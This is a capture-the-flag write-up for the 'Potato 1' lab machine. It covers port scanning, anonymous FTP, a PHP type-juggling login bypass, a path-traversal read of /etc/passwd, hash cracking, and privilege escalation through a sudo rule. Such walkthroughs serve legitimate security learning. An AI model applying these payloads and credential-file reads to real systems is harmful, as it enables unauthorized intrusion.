Potato 1
Easy, Real life like

I have completed this in 3 steps.
Enumeration: Nmap helped to get in
Exploitation: Burp proxy and php vulnerability
Post exploitation: Abusing admin permission
So let's talk in detail.
1. Enumeration
1) At first, I need to know the target IP, so:
netdiscover -i eth0 -r 10.0.0.0/16
and I got the IP: 10.0.2.39
2) As always I have started with all port scanning
nmap -p- -v -Pn 10.0.2.39
and I have got 3 ports open:
Discovered open port 22/tcp on 10.0.2.39
Discovered open port 80/tcp on 10.0.2.39
Discovered open port 2112/tcp on 10.0.2.39
3) Now digging deeper to those ports:
nmap -sV -O -p80,22,2112 -v -Pn 10.0.2.39
An unusual port running FTP:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
2112/tcp open ftp ProFTPD
4) As it has a web page, so I have started dirbuster to scan:


5) Nikto scan also reveals similar info to dirbuster:
nikto -h http://10.0.2.39/
Scan report is:
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
6) Found /admin, /admin/index.php. These page are showing one login form.

7) Attempted to brute force or guess the password I have failed
8) Found logs.txt but nothing interesting found except - Admin has changed password.

9) After some failed attempt to brute force, I have focused on FTP. FTP login:
ftp -p 10.0.2.39 2112
I have found: - anonymous login allowed - found 2 interesting files
-rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg
downloaded those files:
get index.php.bak
2. Exploitation
10) From index.php.bak, I can see the source code:

11) I have tried SQL injection but failed. After some research, I have found this article about - type juggling. It helps!
12) Successfully exploited this vulnerability. I have used - password[]=""

13) Result:

14) But I am facing access denied message:

15) Other pages don't have any interesting this except the Logs. I have intercepted all the request with Burp. And I have found an interesting entry in logs. This will probably lead to LFI.

16) I have tried file=../../../../../etc/passwd

17) got = webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6. Here I have used john the ripper and I have got:
user: webadmin
pass: dragon
18) Now login to ssh
ssh webadmin@10.0.2.39
and eventually I have found the user flag

3. Post Exploitation
19) Now I need root access. I have searched for another profile then webadmine's privilege

20) Here, webadmin cat execute /notes and anything after it. That's the key point! I have created a small shell and executed it.

21) Finally I have got root flag in /root/root.txt
bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNpZWwuIA==
Hope this write up will help you. Any feedback is appreciated
Last updated
Was this helpful?